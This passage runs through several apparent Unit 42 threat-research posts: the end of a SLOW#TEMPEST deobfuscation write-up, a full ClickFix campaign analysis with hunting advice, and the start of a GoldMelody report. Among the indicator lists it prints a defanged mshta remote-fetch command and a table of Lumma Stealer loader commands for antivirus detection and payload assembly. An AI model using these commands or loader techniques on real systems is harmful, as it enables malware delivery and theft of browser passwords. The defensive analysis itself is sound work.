Imagine the program is a complex dance routine. Normally, the dancers move predictably from one step to the next. However, in this case, the program has hidden "jump points." Before each jump, there's a mini-routine, like a secret handshake, that decides exactly where the next jump will land. These secret handshakes are all a bit different, making it very hard to predict the dance's true path, almost like the dancers are improvising where they'll go next, even though it's all pre-programmed.

Each dispatcher implements a two-way branching mechanism. The code path taken depends on the state of the Zero Flag (ZF) or the carry flag (CF) when the dispatcher is entered. These flags, which are set by previous instructions to indicate the result of an operation (e.g., zero or overflow), determine which branch is taken. Each dispatcher has a pair of conditional move (CMOVNZ) or set (SETNL) instructions and an indirect jump (JMP RAX). This creates a dynamic control flow that depends on runtime conditions and memory contents, making static analysis difficult.

ZF and CF are CPU status flags that reflect arithmetic and logical operation outcomes. These flags act as internal switches, enabling dynamic program execution based on prior computation results. Each conditional move or set instruction has two possible target addresses: one for a true condition and the other for a false condition. For example, the conditional move if not zero (CMOVNZ) instruction will only move data if the ZF is 0, indicating that the previous operation did not result in 0. If the ZF is 1 (meaning the previous result was 0), the CMOVNZ instruction will not move the data, and execution will continue to a different target address.

Figure 5 shows one of the dispatchers. We annotated the instructions to explain how the destination addresses are computed.

Screen capture of computer code in an IDE, showing various assembly language instructions and memory addresses with comments explaining their functionality.
Figure 5. CPU instructions of one dispatcher.

Using Unicorn — a multi-platform, multi-architecture CPU emulator framework — automates the identification of destination jump addresses. We achieve this by executing the nine instructions preceding each JMP RAX in a controlled manner, rather than running the entire binary. This allows us to determine the jump addresses for each dispatcher.

To extract the bytecodes of these instructions, we use the code shown in Figure 6.

Screenshot of a code snippet, including a function named 'setup_emulate (JMP_RAX)' with comments and hexadecimal conversions.
Figure 6. Code to extract the bytecodes of the dispatchers.

Next, we emulate each dispatcher. Since each dispatcher uses a two-way branching mechanism with two target addresses, the emulation process must be repeated twice for each dispatcher to determine both destination addresses. Figure 7 shows the code used to emulate the dispatchers.

A screenshot of computer code including various programming-related texts, symbols, and functions. The image shows code related to data segment initialization and memory manipulation functions as well as destination address computation.
Figure 7. Code to emulate the dispatcher to determine the destination addresses.

After computing the two destination addresses, we replaced the dispatcher instructions with direct jump instructions to those addresses, effectively removing the CFG obfuscation. This allowed us to see the original code flow easily in IDA Pro. Figure 8 shows the code to patch the instructions in the IDA database.

Screenshot of code displaying functions related to memory address manipulation, including use of hex values and byte handling.
Figure 8. Code to patch the dispatchers with de-obfuscated jump instructions.

Finally, we forced IDA Pro to re-analyze the entire function that was patched using the code shown in Figure 9. This was to trigger IDA Pro to update its CFG based on the de-obfuscated instructions.

Screenshot of a script in an integrated development environment, showing a function named 'fix_function' with code involving loops and operations for item deletion and instruction creation using the IDA Pro APIs.
Figure 9. Code to force IDA Pro to re-analyze the patched functions.

The complete script for resolving with CFG obfuscation using dynamic jumps is available at emu_jmp_rax_idapython.py.

After executing this script, the Hex-Rays decompiler successfully decompiled the main function within the loader DLL. Figure 10 shows part of the decompilation output.

A screenshot of a computer screen displaying complex programming code in an IDE, with highlighted syntax in various colors including yellow, blue, and white on a dark background.
Figure 10. Decompiled output of the main function in the loader DLL.

However, we observed that further obfuscation remained in the code. Specifically, most functions were called dynamically, and we did not observe any direct Windows API calls. This made it challenging to immediately discern the code's purpose, as the actual functionality was obscured by indirect function resolution.

Obfuscated Function Calls

Obfuscated function calls use indirect calls, where the function's address is calculated dynamically at runtime and then called through a pointer, instead of directly invoking the function by its name. Attackers use this technique to hinder static analysis, as the actual target function is not immediately apparent in the code. This makes it more difficult to understand the program's behavior and identify malicious actions.

Analysis of the main function's assembly code reveals the presence of multiple obfuscated function calls. The Call RAX instruction is a key indicator, as it signifies that the function address is being dynamically determined at runtime rather than being directly specified in the code. Similar to dynamic jumps, the target addresses of these function calls were calculated at runtime. We were not able to determine the target addresses without executing the binary. Figure 11 shows some of the obfuscated function calls.

Image showing a section of coding with assembly language instructions. The text is highlighted in various colors including blue, green, and orange on a dark background for clarity. All of the calls in the code are highlighted.
Figure 11. Instructions of multiple obfuscated function calls.

To determine the target address of obfuscated function calls, we applied a similar approach to the one we used for dynamic jumps. This is because both techniques involve calculating target addresses at runtime.

Our script successfully calculated the destination addresses of these obfuscated function calls. However, we observed that IDA Pro failed to identify the arguments of standard Windows APIs even though the destination addresses were correctly resolved, as Figure 12 shows. This is because there was missing function signature information linking the addresses of the Windows APIs with the obfuscated function calls.

Screenshot of computer code featuring various operations such as mov, add, and lea with hexadecimal values and register names.
Figure 12. Destination addresses of the obfuscated function calls resolved.

To enable IDA Pro to correctly identify the function arguments, rename local variables and perform proper analysis, we needed to explicitly set the “callee” address for each obfuscated function call using the code shown in Figure 13. This provides IDA Pro with the necessary information to recognize the function as a known Windows API.

Screen capture displaying script for IDA Pro related functions involving memory addresses and internal metadata management. The text is shown in a coding interface with syntax highlighting.
Figure 13. Code to set the “callee” address to each obfuscated function call.

After adding the code shown in Figure 13 to set the callee address, IDA Pro will automatically label function arguments and rename local variables for each obfuscated function call. This significantly improved our ability to read and analyze the code, allowing us to understand the function's purpose more easily. Figure 14 shows some of the function arguments that IDA Pro labeled.

A screenshot displaying a section of assembly language code viewed in a text editor, containing various operation commands and parameters.
Figure 14. Function arguments and local variables renamed for the obfuscated function calls.

The complete script for resolving obfuscated function calls is at emu_call_rax_idapython.py.

After executing this script, we successfully de-obfuscated both the control flow and the function calls within the loader DLL. With the code now significantly more readable and the Windows API calls properly identified, we could proceed with analyzing its core functionality. In the final section, we examine the main purpose of the loader DLL.

Loader DLL Analysis

After removing the obfuscation using the scripts emu_call_rax_idapython.py and emu_call_rax_idapython.py, we easily located the main functionality of the loader DLL.

First, we observed an anti-sandbox check that uses the Windows API GlobalMemoryStatusEx to determine the total physical memory available on the system. The loader DLL will only unpack its payload and execute it in memory if the target machine has at least 6 GB of RAM. Figure 15 shows the pseudocode of the core components of the loader DLL.

A screenshot of a computer screen displaying a segment of code in a text editor, with various functions and variables. The text is sharp and easily readable against a dark background and uses syntax highlighting.
Figure 15. Pseudocode of the core components of the loader DLL.

Conclusion

​​The SLOW#TEMPEST campaign's evolution highlights malware obfuscation techniques, specifically dynamic jumps and obfuscated function calls. This illustrates the importance for security practitioners to adopt advanced dynamic analysis techniques (e.g., emulation) alongside static analysis to effectively dissect and understand modern malware.

The success of the SLOW#TEMPEST campaign using these techniques demonstrates the potential impact of advanced obfuscation on organizations, making detection and mitigation significantly more challenging. Understanding how threat actors leverage these methods is crucial for developing robust detection rules and strengthening defenses against increasingly complex threats.

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • Advanced WildFire can detect the malware samples discussed in this article.
  • Cortex XDR and XSIAM are designed to prevent the execution of known malicious malware, and also prevent the execution of unknown malware using Behavioral Threat Protection and machine learning based on the Local Analysis module. The Cortex Shellcode AI module can help detect and prevent shellcode attacks.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
  • UK: +44.20.3743.3660
  • Europe and Middle East: +31.20.299.3130
  • Asia: +65.6983.8730
  • Japan: +81.50.1790.0200
  • Australia: +61.2.4062.7950
  • India: 00080005045107

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

  • SHA256 hash: a05882750f7caac48a5b5ddf4a1392aa704e6e584699fe915c6766306dae72cc
  • File size: 7.42 MB
  • File description: ISO file distributed in the SLOW#TEMPEST campaign
  • SHA256 hash: 3d3837eb69c3b072fdfc915468cbc8a83bb0db7babd5f7863bdf81213045023c
  • File size: 1.64 MB
  • File description: DLL used to load and execute the payload
  • SHA256 hash: 3583cc881cb077f97422b9729075c9465f0f8f94647b746ee7fa049c4970a978
  • File size: 1.64 MB
  • File description: DLL with encrypted payload in the overlay segment

References

Links to de-obfuscation scripts mentioned in this article:

Updated July 11, 2025, at 7:20 a.m. PT to add links to de-obfuscation scripts. 

Fix the Click: Preventing the ClickFix Attack Vector

Posted on by Samantha Stallings

Executive Summary

In this article, we share hunting tips and mitigation strategies for ClickFix campaigns and provide an inside view of some of the most prominent ClickFix campaigns we have seen so far in 2025:

  • Attackers distributing NetSupport remote access Trojan (RAT) are ramping up activities with a new loader
  • Attackers distributing Latrodectus malware are luring victims with a new ClickFix campaign
  • Prolific Lumma Stealer campaign targeting multiple industries with new techniques

ClickFix is an increasingly popular technique that threat actors use in social engineering lures. This technique tricks potential victims into executing malicious commands, under the pretense of conducting “quick fixes” for common computer issues.

These campaigns use the reputations of legitimate products and services to hide their activities in a way that makes them more difficult to spot. This does not imply that the author of the executable file is at fault or liable for the outcome caused by the malware.

ClickFix campaigns have impacted organizations in a wide variety of industries, including:

  • High technology
  • Financial services
  • Manufacturing
  • Wholesale and retail
  • State and local government
  • Professional and legal services
  • Utilities and energy

Unit 42 has recently assisted in almost a dozen incident response cases in which a ClickFix lure was the initial access vector.

An effective ClickFix lure could enable threat actors to perform a complete takeover of the targeted organization. These lures can be fairly simple for threat actors to prepare, leaving organizations susceptible to credential gathering, mail theft and even ransomware incidents.

We identified two variations of this technique:

  • Instructing a target to run malicious commands in the Run window by pressing Windows Key + R (Win+R)
  • Instructing a potential victim to run malicious commands in a terminal window by pressing Windows Key + X (Win+X)

Palo Alto Networks customers are better protected from the threats described here through the following products and services:

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics Social Engineering, Malware, Malvertising

Dissecting the ClickFix Technique

Before we examine the ClickFix technique, we must better understand what ClickFix is and how prevalent it has become in recent months.

ClickFix is a relatively new social engineering technique that threat actors increasingly use in attack campaigns. This technique misleads targeted users into applying “quick fixes” to common computer issues, such as performance issues, missing drivers or pop-up errors. In recent months, many of the lures using the ClickFix technique have been fake verification pages asking victims to complete an action before supposedly continuing to the viewer's intended destination.

Threat actors often deliver these lures through:

  • Legitimate but compromised websites
  • Malvertising
  • YouTube tutorials
  • Fake tech support forums

The ClickFix technique relies on clipboard hijacking. Webpages using ClickFix inject malicious script or commands into a potential victim's clipboard and provide instructions to paste and run the malicious content. Because the ClickFix technique asks users to paste the content, this is sometimes referred to as “pastejacking.”

Attackers use the ClickFix technique as an initial infection vector and the payloads that follow it vary — some lures drop infostealers, others deploy RATs or disable security tools. But all rely on convincing the victim to do the attacker’s job for them: running the code manually.

This delivery method bypasses many standard detection and prevention controls. There is no exploit, phishing attachment or malicious link. Instead, potential victims unknowingly run the command themselves, through a trusted system shell.

This method makes infections from ClickFix more complicated to detect than drive-by downloads or traditional malware droppers. However, researchers can still look for artifacts to detect these infections.

The Rise of a Global Phenomenon

We have been closely monitoring ClickFix lures in recent months and have found scores of variants that deliver multiple malware families. Figure 1 shows the distribution of cases per week.

Bar chart showing the count of events by week, from week starting 2024-12-30 to 2025-05-12. Event counts range from a low of 1 to a high of 126. Major peaks are noted at week starting 2025-01-27 with 121 events and 2025-03-24 with 126 events.
Figure 1. Weekly infection instances since the beginning of 2025.

Our researchers also noted the impact of ClickFix across a wide variety of business sectors, as shown in Figure 2.

Bar graph showing the count of entities by industry. Industries represented from highest to lowest counts are: High Technology, Financial Services, Manufacturing, Wholesale and Retail, State and Local Government, Professional and Legal Services, Utilities and Energy, Pharma and Life Sciences, Hospitality, Telecommunications, Healthcare, Federal Government, Education. Palo Alto Networks and Unit 42 logo lockup.
Figure 2. Distribution of industries affected by ClickFix lures.

Case Studies

Three of the most prominent campaigns we have observed so far in 2025 show how threat actors have integrated ClickFix into the attack flow of various malware families.

NetSupport RAT Switches Up Its Loading

During ClickFix-related activity hunting, we identified one particularly prolific campaign that was active in May 2025. In this campaign, attackers using NetSupport RAT impacted various industries, including:

  • Healthcare
  • Legal services
  • Telecommunications
  • Retail
  • Mining

This ClickFix campaign distributing NetSupport RATs leverages distribution domains that masquerade as legitimate and popular services:

  • DocuSign: A digital platform for signing, sending and managing documents electronically.
  • Okta: A platform that helps companies manage and secure user access to applications and systems. It provides single sign-on (SSO), multifactor authentication and identity management services.

Threat actors often abuse, take advantage of or subvert legitimate products for malicious purposes. This does not imply that the legitimate product is flawed or malicious.

Figures 3 and 4 show the fake DocuSign and Okta landing pages:

Spoofed landing page for PandaDoc, discussing the document signing alternative, highlighting ease and cost-effectiveness, with various industry badges and logos of trusted brands.
Figure 3. Fake landing page for DocuSign at docusign.sa[.]com.
A screenshot of a spoofed security verification page featuring a checkbox labeled "Verify you are human" with a Cloudflare logo below it. The text explains that the site needs to review the security of your connection before proceeding.
Figure 4. Fake landing page for Okta at oktacheck.it[.]com.
We suspect this ClickFix campaign distributes NetSupport RAT over ClearFake infrastructure. Our suspicion is based on the similarities between the ClickFix lure and ClearFake infrastructure. Both contain the same Russian comments and use identical JavaScript clipboard injection functionality.

ClearFake is a malicious JavaScript framework deployed on compromised websites as part of drive-by download campaigns used by other malware strains. Figure 5 shows ClearFake injecting an encoded PowerShell command using the JavaScript function unsecuredCopyToClipboard. The figure also shows comments in Russian within the code, giving us clues to the ClearFake developer’s origins.

A screenshot split into two sections showing verification steps on the left and computer code on the right. On the left, an orange interface instructs the user to complete verification steps like pressing and holding windows key and R, and verifying by pressing Enter. This is the first step. On the right, a coding interface with lines of code in red and black colors, notes in Russian, indicating modifications to a PowerShell command. The second step is the obfuscated PowerShell command injected to a user's keyboard.
Figure 5. Landing page and script injection in a fake DocuSign page.

The fake verification window displays instructions to open the Run dialog and then paste the clipboard contents into it, with the interface presenting these instructions as a test to prove that the user is human. The victim might be unaware of the malicious PowerShell command that the website subsequently injects (as mentioned above, this is an example of pastejacking).

Once executed, the command downloads another PowerShell script that downloads and executes the next stage in the attack. The infection chain is mapped out in Figure 6.

Flowchart illustrating a cyber attack involving fake Okta website prompts, execution of Cmd.exe, and PowerShell to download and run malicious software including NetSupport RAT and various executable files, leading to data injection and exfiltration.
Figure 6. The NetSupport RAT infection chain.

The next stage is contained within a ZIP archive, which includes all the legitimate dependencies required to execute jp2launcher.exe. This file is a legitimate Java Runtime Environment (JRE) component used to launch Java applications, as Figure 7 shows.

Screenshot of a computer screen displaying a list of files primarily related to Microsoft Windows components and applications. Each file entry shows the file name, modification date, type, and size. Three rows are highlighted in a red box.
Figure 7. Contents of the ZIP archive downloaded by cmd.exe.

First, cmd.exe downloads the ZIP archive, extracts its content and saves that content in the %APPDATA%/Local/Temp/ directory. Then, cmd.exe launches jp2launcher.exe, which sideloads a malicious loader named msvcp140.dll. The Appendix of this article provides a full technical analysis of the new DLL-based NetSupport RAT loader.

Finally, the DLL downloads and executes a ZIP archive that contains NetSupport RAT (client32.exe) and associated files. NetSupport RAT is legitimate software, but out-of-date or stolen copies are often misused by different threat actors, usually configured as a RAT for infiltration and endpoint infection.

Latrodectus Spins New ClickFix Lures

During March-April 2025, we noticed an increasing amount of traffic to Latrodectus-controlled domains. We also saw a shift in infection strategy, as attackers distributing Latrodectus started to use the ClickFix technique in their initial access vectors.

This Latrodectus attack chain begins when a person visits a legitimate, but compromised website. Then, ClearFake infrastructure redirects the site visitor to a fake verification page. This page presents a prompt instructing the viewer to run a command via the Run dialog, while the malicious JavaScript backend injects a PowerShell command into the endpoint’s clipboard.

Figure 8 below shows the lure and the subsequent redirection chain from the compromised site.

Screenshot of a computer screen displaying a captcha verification page instructing the user to complete steps using keyboard shortcuts. The screen also shows web development tools open in the browser with various script names visible.
Figure 8. Latrodectus ClickFix lure.

When victims paste and execute the injected command, they do not see the command itself. What they do see is the final comment at the end of the script (Cloud Identificator: 2031), which looks like part of a normal authentication process. However, upon execution, the script uses curl.exe to download a JavaScript file from a command-and-control (C2) server. It then executes the file via Cscript, as Figure 9 shows.

Code snippet with syntax highlighting in dark mode, with some redactions for privacy.
Figure 9. A malicious command injected from a ClickFix lure onto the target’s clipboard.

Since its emergence in mid-2024, attackers have frequently delivered Latrodectus through a chain that includes a malicious JavaScript file downloading a Microsoft Software Installer (MSI) file that drops Latrodectus. In this case, the executed JavaScript file (la.txt) retrieves an MSI file from a remote server and runs it using msiexec.exe.

Unlike earlier campaigns where the JavaScript downloader was typically bloated and obfuscated with nonsensical comments, this variant employs large junk JSON variables that have seemingly legitimate names, such as var_Apple_Palantir38 and func_Slack_encryption84. Figure 10 shows a comparison of the obfuscation techniques used in past and recent Latrodectus campaigns.

Two side-by-side images displaying coding scripts: the left shows a code snippet with variables and functions, while the right features a code block with a loop and conditional statements.
Figure 10. Comparison between recent (left) and older (right) obfuscation techniques used in Latrodectus droppers.

The MSI payload drops several files onto the victim’s disk. These include Latrodectus, which is dropped as a malicious DLL file (libcef.dll), and a legitimate binary that sideloads the DLL. This is demonstrated in Figure 11.

Diagram of the Latrodectus infection chain, starting with a compromised legitimate website and moving through the ClickFix tactic, leading to the downloading and execution of an EXE file and malicious shell code.
Figure 11. The Latrodectus infection chain.

When the legitimate file side-loads the malicious DLL for Latrodectus, it injects shellcode into itself.

In a May 2025 Timely Threat Intelligence post, we analyzed a similar Latrodectus campaign, in which Lumma Stealer was the final payload of the full attack chain.

Lumma Stealer Typosquatting Campaign

While attackers distributing Lumma Stealer started using the ClickFix infection technique in late 2024, we have seen a surge in ClickFix infection attempts for Lumma Stealer as recently as April 2025. In recent campaigns, attackers distributing Lumma Stealer have impacted a broad range of sectors, including:

  • Automotive
  • Energy
  • IT
  • Software

Our investigation into one of these ClickFix campaigns revealed that targets are prompted to copy a unique MSHTA command with the following structure: mshta xxxx[.]co/xxxxxx =+\xxx.

The attackers give each target a specific identifier string, which they can use to receive the payload once. However, the URIs our researchers checked were no longer delivering the payloads post-infection.

Upon executing the ClickFix script, the script redirects the viewer to a typosquatted version of the IP Logger domains iplogger[.]org and iplogger[.]com. IP Logger is a URL shortening and IP tracking service that creates links to log information about visitors, such as:

  • IP addresses
  • Geolocation
  • Device details
  • Browsing behavior

The typosquatted domain controlled by the attackers is iplogger[.]co, and the page for this domain is disguised as a known and legitimate service.

In all instances of the campaign, we observed that the MSHTA command downloaded an encoded PowerShell script, which initiated a Lumma Stealer infection. Figure 12 demonstrates the entire infection chain.

Lumma Stealer infection depicting the process of a malware attack involving entities like ClickFix, Encoded PowerShell, Lumma Stealer, and various functions like contacting Command and Control (C2) server, building executables, and detecting security products. The chart shows connections and actions such as resource dropping and execution commands throughout the attack lifecycle.
Figure 12. The Lumma Stealer infection chain.

Each attacker-controlled link hosts a heavily obfuscated and Base64-encoded PowerShell command that ultimately leads to the drop and execution of a malicious Lumma Stealer stager named PartyContinued.exe. This executable is hosted at: hxxps[:]//pub-<dynamically generated number string>.r2[.]dev and is named to seem like a legitimate developer URL.

When PartyContinued.exe launches, it sets up a new Lumma loading method that uses a scripting language called AutoIt. This version of Lumma Stealer is similar to earlier versions but includes a new Microsoft cabinet archive (CAB) file named Boat.pst. This CAB file is bundled inside PartyContinued.exe and holds the rest of the content that is used to create an AutoIt3 script engine and an AutoIt script it executes for Lumma Stealer.

Table 1 summarizes the commands executed by the loader and their purpose:

Command Description Purpose
tasklist | findstr /I "opssvc wrsa" Performs a case-insensitive search for opssvc or wrsa in the name of a running process. Endpoint security software detection
tasklist | findstr "bdservicehost SophosHealth AvastUI AVGUI nsWscSvc ekrn" Searches for various strings in the running processes. Endpoint security software detection
cmd /c md 386354 Creates a directory for saving the malware to disk. Set location for payload extraction
extrac32 /Y /E Boat.pst Extracts files from the .cab file named Boat.pst, overwriting existing files (/Y) and extracting all files (/E). Payload extraction
set /p ="MZ" > 386354\Slovenia[.]com <nul Creates a file named Slovenia[.]com under the 386354 directory containing two bytes for the characters MZ. Construct the AutoIt3 executor
findstr /V "Tr" Bell >> 386354\Slovenia[.]com Appends all lines in the extracted file named Bell that do not contain the string Tr (case-sensitive) to the file Slovenia[.]com. Construct the AutoIt3 executor
cmd /c copy /b 386354\Slovenia[.]com + Sewing + Monetary + Covered + Health + Loss + Intel + Escape + Tramadol + Apparatus 386354\Slovenia[.]com Appends other extracted files to finish creating a binary file using copy /b. The result is a copy of AutoIt3.exe, which is named Slovenia[.]com. Construct the AutoIt3 executor
cmd /c copy /b ..\Presently.pst + ..\Instantly.pst + ..\Roy.pst + ..\Tolerance.pst + ..\Mailto.pst + ..\Marco.pst + ..\Mint.pst G  Creates a binary named G that Slovenia[.]com will run as an AutoIt v3 compiled script (.a3x). Construct the Lumma Stealer payload (binary run as an .a3x file
start Slovenia[.]com G Command for the AutoIt3 executor to run the binary for Lumma Stealer as an .a3x file. Load/run Lumma Stealer
choice /d y /t 5 Command to select yes (y) for the default option (/d) for commands in the .bat file after waiting five seconds (/t 5).  Allows Lumma Stealer to run without any user interaction

Table 1. Commands executed by the loader for Lumma Stealer.

As shown in the table, Slovenia[.]com is a copy of the AutoIt3 script engine AutoIt3.exe that executes a binary run as an AutoIt script (.a3x) named G, which is responsible for the next stages of the attack. This version of Latrodectus harvests sensitive information, including Chromium-based browser passwords, and attempts to exfiltrate them to a C2 server at sumeriavgv[.]digital.

Hunting for ClickFix Infections

ClickFix attacks often leave easily detectable traces, especially when the people who view these lures are unfamiliar with opening administrative interfaces, making them more likely to paste a malicious command string into a Run window.

Reviewing RunMRU Artifacts

Windows maintains a registry key that stores the most recently executed commands from the Run window (Win + R), called RunMRU:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

This registry key saves any commands that are executed from the Run window, enabling analysts to parse these entries to look for signs of suspicious usage.

Some key indicators for suspicious RunMRU contents could be:

  • Obfuscated content
  • Keywords related to the download and execution of payloads from unknown or suspicious domains
  • Keywords indicating calls to administrative interfaces

These entries indicate that someone might have manually triggered such commands, which is consistent with a ClickFix infection flow.

Detecting Win + X ClickFix

Some attackers aim to avoid exposing their activity in the RunMRU registry key. They instead present instructions to launch a terminal for PowerShell (Windows 11) or Command Prompt (Windows 10) via Win+X for the Quick Access Menu. A March 2025 report reveals that attackers distributing Havoc used this Win+X variation of ClickFix.

Threat hunters can look for signs of this Win+X ClickFix technique using EDR telemetry or Windows Event Logs — specifically:

  • Security event ID 4688 (Process Creation): Look for powershell.exe spawned by explorer.exe, in correlation with Event ID 4663 (Object Access) of files under the %LocalAppData%\Microsoft\Windows\WinX\ folder.
  • Shell usage patterns: Elevated PowerShell sessions invoked shortly after interactive logins, followed by network connections or suspicious child processes (e.g., certutil.exe, mshta.exe and rundll32.exe), are often red flags.
  • Clipboard monitoring: Since ClickFix lures rely on potential victims pasting malicious content from the clipboard, we can correlate paste activity with PowerShell execution shortly after the user types Win+X.

Conclusion

The ClickFix technique is a growing threat, with dynamically shifting approaches in its implementation. Threat actors leverage ClickFix in attacks against organizations, exploiting human error for propagation and persistence.

This article explored three prominent ClickFix campaigns — NetSupport RAT, Latrodectus and Lumma Stealer — all of which are constantly adapting and incorporating new techniques.

Practical methodologies for hunting and detecting ClickFix lures include investigating EDR telemetry or Windows Event Logs for suspicious events, activities and patterns.

Proactively addressing this evolving threat is vital to the ongoing security of organizations. To this end, efforts should be made to increase awareness by educating personnel to be wary of ClickFix lures. This should be done while also setting up defense and monitoring measures based on our hunting suggestions.

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • Advanced WildFire
  • Advanced URL Filtering and Advanced DNS Security detect ClickFix attacks, such as those discussed in this blog, with our offline security web crawlers by detecting malicious commands injected into the clipboard buffer by malicious JavaScript
  • Cortex XDR and XSIAM prevent all campaigns and malware discussed in this article through the Behavioral Threat Protection module

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
  • UK: +44.20.3743.3660
  • Europe and Middle East: +31.20.299.3130
  • Asia: +65.6983.8730
  • Japan: +81.50.1790.0200
  • Australia: +61.2.4062.7950
  • India: 00080005045107

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

SHA256 Hashes From Lumma Stealer Example

  • Filename PartyContinued.exe: 2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef
  • Filename Boat.pst (a CAB file): 06efe89da25a627493ef383f1be58c95c3c89a20ebb4af4696d82e729c75d1a7

Domains From Lumma Stealer Example

  • iplogger[.]co
  • stuffgull[.]top
  • sumeriavgv[.]digital
  • pub-164d8d82c41c4e1b871bc21802a18154.r2[.]dev
  • pub-626890a630d8418ea6c2ef0fa17f02ef.r2[.]dev
  • pub-164d8d82c41c4e1b871bc21802a18154.r2[.]dev
  • pub-a5a2932dc7f143499b865f8580102688.r2[.]dev
  • pub-7efc089d5da740a994d1472af48fc689.r2[.]dev
  • agroeconb[.]live
  • animatcxju[.]live

SHA256 Hashes From Latrodectus Example

  • Filename libecf.dll: 5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1
  • PowerShell Downloader: 52e6e819720fede0d12dcc5430ff15f70b5656cbd3d5d251abfc2dcd22783293
  • JavaScript Downloader: 57e75c98b22d1453da5b2642c8daf6c363c60552e77a52ad154c200187d20b9a
  • JavaScript Downloader: 33a0cf0a0105d8b65cf62f31ec0a6dcd48e781d1fece35b963c6267ab2875559

C2 URLs From Latrodectus Example

  • hxxps[:]//webbs[.]live/on/
  • hxxps[:]//diab[.]live/up/
  • hxxps[:]//mhbr[.]live/do/
  • hxxps[:]//decr[.]live/j/
  • hxxps[:]//lexip[.]live/n/
  • hxxps[:]//rimz[.]live/u/
  • hxxps[:]//byjs[.]live/v/
  • hxxps[:]//btco[.]live/r/
  • hxxps[:]//izan[.]live/r/
  • hxxps[:]//k.veuwb[.]live/234
  • hxxps[:]//r.netluc[.]live
  • heyues[.]live
  • hxxps[:]//k.mailam[.]live/234234

SHA256 Hashes From NetSupport RAT Example

  • Filename data_3.bin (XOR encrypted stager): 5C762FF1F604E92ECD9FD1DC5D1CB24B3AF4B4E0D25DE462C78F7AC0F897FC2D
  • Filename data_4.bin (XOR encrypted shellcode): 9DCA5241822A0E954484D6C303475F94978B6EF0A016CBAE1FBA29D0AED86288
  • Filename msvcp140.dll (loader): CBAF513E7FD4322B14ADCC34B34D793D79076AD310925981548E8D3CFF886527
  • NetSupport Loader Mutex:
    nx0kFgSPY8SDVhOMjmNgW
  • libsqlite3-0.dll: 506ab08d0a71610793ae2a5c4c26b1eb35fd9e3c8749cd63877b03c205feb48a
  • File location C:\ProgramData\SecurityCheck_v1\client32.exe: 3ACC40334EF86FD0422FB386CA4FB8836C4FA0E722A5FCFA0086B9182127C1D7

Domains for the Loader From the NetSupport RAT Example

  • oktacheck.it[.]com
  • doccsign.it[.]com
  • docusign.sa[.]com
  • dosign.it[.]com
  • loyalcompany[.]net
  • leocompany[.]org
  • 80.77.23[.]48
  • mhousecreative[.]com

C2 Domains From the NetSupport RAT Example

  • mh-sns[.]com
  • lasix20[.]com

Additional Resources

Appendix: Technical Analysis of the New NetSupport RAT Loader

This section dives into the new DLL-based NetSupport RAT loader, which presents a greater challenge to analysts than previous campaigns. In the past, NetSupport RAT was loaded by script loaders with relatively short infection chains, whereas this loader adds a level of stealth and complexity to the attack.

The example we analyze here is named msvcp140.dll. This DLL file is sideloaded by a legitimate executable named jp2launcher.exe.

This DLL uses several techniques to hinder analysis, such as:

  • Dynamic API resolving
  • Data encryption
  • Code obfuscation

For example, after being sideloaded by jp2launcher.exe, the DLL writes the code of its following stages byte-by-byte on the stack. After this, it deobfuscates and executes the code.

After the initial deobfuscation, the DLL retrieves encrypted binaries named data_3.bin and data_4.bin from the C2 server via curl.exe and drops the payloads to disk in the same working directory. Figure 13 shows the construction of the curl.exe command to download one of the payloads.

Screenshot of HTML with syntax highlighting showing various commands and such as mov and push.
Figure 13. Malicious msvcp140.dll loader constructs curl commands to download .bin files shown in x64dbg debugger.

The loader saves both data_3.bin and data_4.bin to disk as encrypted binaries, then decrypts them in memory using a rolling XOR key, which is https://google[.]com/. The loader then injects the decrypted code into a child process of jp2launcher.exe.

The decrypted code from data_4.bin is a relatively small shellcode that loads decrypted code from data_3.bin. This binary is a fully formed PE that downloads the final NetSupport RAT package as a ZIP archive from the attacker’s C2 server and unzips it in memory. Figure 14 shows the loader’s request to hxxp[:]//80.77.23[.]48/service/settings/5702b2a25802ff1b520c0d1e388026f8074e836d4e69c10f9481283f886fd9f4. The request contains a unique user agent.

Screenshot of a computer log detailing HTTP server requests with timestamps and server responses.
Figure 14. jp2launcher.exe download request from C2, downloading client32.exe.

The final payload is a ZIP archive that contains NetSupport RAT and all of its required dependencies. The loader drops NetSupport RAT into C:\ProgramData\SecurityCheck_v1\ and executes its main binary, client32.exe.

The loader then sets up persistence for the RAT by creating a scheduled task that executes client32.exe whenever a user logs in.

In the process of statically analyzing the loader, we noticed a unique PDB path, indicating that this DLL is part of a certain series of MsiShell tools. Pivoting on this path, we found another instance of the campaign. In this case it used legitimate file transfer software, filezilla.exe and sideloaded another version of the loader, libsqlite3-0.dll. Figure 15 shows the similarity between the PDB paths of the two loader versions.

Two screenshots showing file paths and GUIDs for software projects, both of them being Debug Artifacts. Each item is highlighted in red.
Figure 15. PDB paths of both NetSupport RAT loader versions.

Updated July 10, 2025, at 8:05 a.m. PT.

GoldMelody’s Hidden Chords: Initial Access Broker In-Memory IIS Modules Revealed

Posted on by Samantha Stallings

Executive Summary

Unit 42 researchers uncovered a campaign by an initial access broker (IAB) to exploit leaked Machine Keys — cryptographic keys used on ASP.NET sites — to gain access to targeted organizations. IABs breach organizations and then sell that access to other threat actors.

This report analyzes the tools used in these attacks. We track this actor as the temporary group TGR-CRI-0045. The group seems to follow an opportunistic approach but has attacked organizations in Europe and the U.S. in the following industries: financial services, manufacturing, wholesale and retail, high technology, and transportation and logistics.

